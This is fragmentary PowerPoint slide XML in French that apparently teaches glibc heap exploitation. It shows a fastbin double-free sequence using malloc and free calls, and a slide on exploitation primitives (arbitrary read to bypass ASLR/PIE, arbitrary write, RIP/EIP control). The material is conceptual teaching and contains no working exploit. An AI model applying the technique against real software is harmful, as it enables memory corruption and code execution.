            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins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E62CE14-B58A-4C9F-B900-B2E3F28EBA30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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cake1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>cake2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(x)</a:t>
            </a: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61619681-1DD0-436F-ACB4-CCC1694230A0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4A91689A-42DB-4B6A-9353-468D94DC4099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6B1B7FFD-4097-4904-AC68-41EEBFBD5E52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" name="Flèche : chevron 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E842C0-643A-41D4-8966-E56F890B3687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7" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDB1446-CDC0-4C27-9D2F-77E37172E70B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18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13137AD-32E0-4E2E-A5C6-7BFB1C23C032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15398043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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="1468800" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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cake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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="14688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cake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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="14688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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur : en angle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDB2943-3A13-4CFD-99A2-06323784DB9D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>
          <a:xfrm flipV="1">
            <a:off x="3100304" y="2630096"/>
            <a:ext cx="792888" cy="4544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2CA55B1-5E4B-4102-8A84-A9028AA86EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893192" y="2414072"/>
            <a:ext cx="402608" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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F3D8E90-E533-43B1-9F12-CFE6AE457D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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free(cake1)</a:t>
            </a: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27104038-1E7D-4400-9425-D281BB9D01A4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7" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D4A6D1F-3288-4C4D-A170-93CB8F2822BB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18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B04B013-56B1-4266-8ACA-5688672BC032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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8640626E-D813-4758-A841-BF70E177E2E2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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080721E8-14C9-4FB0-9F4A-DE2895557E8A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21" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05125B7C-B77D-4699-B8E8-19BDB5B065DE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26499082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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="1468800" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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cake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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="1468800" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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cake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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="14688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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur : en angle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDB2943-3A13-4CFD-99A2-06323784DB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100304" y="2634640"/>
            <a:ext cx="2995696" cy="211480"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14086"/>
              <a:gd name="adj2" fmla="val 208095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2CA55B1-5E4B-4102-8A84-A9028AA86EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893192" y="2414072"/>
            <a:ext cx="402608" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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053C57-60A0-407E-8366-2DE8A2859612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361992" y="2414072"/>
            <a:ext cx="402608" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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F381C276-B465-48A8-9940-5F2E932D2CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="0"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="4620232" y="1687032"/>
            <a:ext cx="216024" cy="1670104"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105822"/>
              <a:gd name="adj2" fmla="val 113688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C65E0CC3-F429-4335-999B-617CAEB6879C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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free(cake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F7705EF-B471-4795-98F9-8450B5D21A0E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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE9C98C-4649-467B-AF64-5A566D92F93D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20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4569BA72-8317-4A6F-8099-F71E5ED3D5BF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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438C63F8-A5AE-4C29-89B4-B28B4BA0C353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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE8BC4C-99D2-4116-9E36-F72038592835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23" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02F7239-6202-488D-A573-7C2AF03DAD7B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3816175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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="1468800" cy="432048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cake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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="1468800" cy="432048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cake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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="14688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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur : en angle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDB2943-3A13-4CFD-99A2-06323784DB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100304" y="2634640"/>
            <a:ext cx="1526896" cy="211480"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25951"/>
              <a:gd name="adj2" fmla="val 208095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2CA55B1-5E4B-4102-8A84-A9028AA86EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893192" y="2414072"/>
            <a:ext cx="402608" cy="432048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053C57-60A0-407E-8366-2DE8A2859612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361992" y="2414072"/>
            <a:ext cx="402608" cy="432048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F381C276-B465-48A8-9940-5F2E932D2CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="0"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="4620232" y="1687032"/>
            <a:ext cx="216024" cy="1670104"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105822"/>
              <a:gd name="adj2" fmla="val 113688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 : en angle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FEDC1F-B97E-452F-82D6-37C5716EF0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5095248" y="1845368"/>
            <a:ext cx="12700" cy="2001504"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 372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44B1844C-D81D-4746-8994-D9BA0136199E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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free(cake1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86605AD6-32EF-48DD-9A3E-2A19A37B1FB0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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ECA661D-93D3-4597-8218-68C101EB18EB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20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B61F53B0-9611-4313-BBD1-10FD389D7A8C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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A9305E3-7E58-4287-9303-DB2DBF69735F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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D225451-9D8D-45AF-B843-A92B025C6832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23" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44E8A19E-B5E5-4410-A4DD-52C737ED72A0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16419218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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake 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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="1468800" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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cake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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="14688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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r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CA55B1-5E4B-4102-8A84-A9028AA86EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893192" y="2414072"/>
            <a:ext cx="402608" cy="432048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053C57-60A0-407E-8366-2DE8A2859612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361992" y="2414072"/>
            <a:ext cx="402608" cy="432048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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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F381C276-B465-48A8-9940-5F2E932D2CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="0"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="4620232" y="1687032"/>
            <a:ext cx="216024" cy="1670104"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105822"/>
              <a:gd name="adj2" fmla="val 113688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 : en angle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FEDC1F-B97E-452F-82D6-37C5716EF0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100304" y="2634640"/>
            <a:ext cx="2995696" cy="211480"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10271"/>
              <a:gd name="adj2" fmla="val 208095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7FE758EA-463D-4473-AD91-E2B2CA4A3329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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cake3 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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8032F935-CF96-465E-B0A3-F4D8489F2A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5783351" y="1157265"/>
            <a:ext cx="436592" cy="3814302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08D1572-A823-4605-9E4C-EDC5EF0801D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908798" y="3066688"/>
            <a:ext cx="1468800" cy="432048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20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9C2ACE-7B60-4CAC-A6C5-57F30BF52711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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76DFBFE-B1E8-4402-AAC6-E47757404E7A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22" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{124B97B5-24C1-4CA5-B25E-AEC9BFB4EA0A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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0C5A69-CB8E-460E-9F7B-E8FD9989D129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4" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141A1F60-4218-48FE-AC11-CC399139EDD5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25" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5C87547-068C-484C-BBCC-DA41DA1A027C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643561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2B4E17-D3C9-45D3-8D4C-A606431E4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Exploitation primitive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4C8509-6305-4D69-8DF8-2CB8B22DE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800"/>
            <a:ext cx="9144000" cy="3544416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>« Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>anywhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » : Lire n’importe où =&gt; Bypass ASLR,PIE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>« Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>anywhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » : Ecrire n’importe où =&gt; amène généralement à la première et à la troisième « primitive »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>« Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>everything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » : Contrôler le flux d’exécution (RIP/EIP control) =&gt; exécution de code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Flèche : chevron 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DBC92F-E3EE-44B9-8FED-B4A13AB74807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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout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Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5934D7B7-5220-4A8F-882F-BD6995B6CA8E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malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc,realloc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lèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0FAD48-72DB-48C5-B0A9-E59CBFB23F73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Exploitation primitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B220DDB-8F4F-4E7C-8B5F-1059108351B7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is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predictable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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
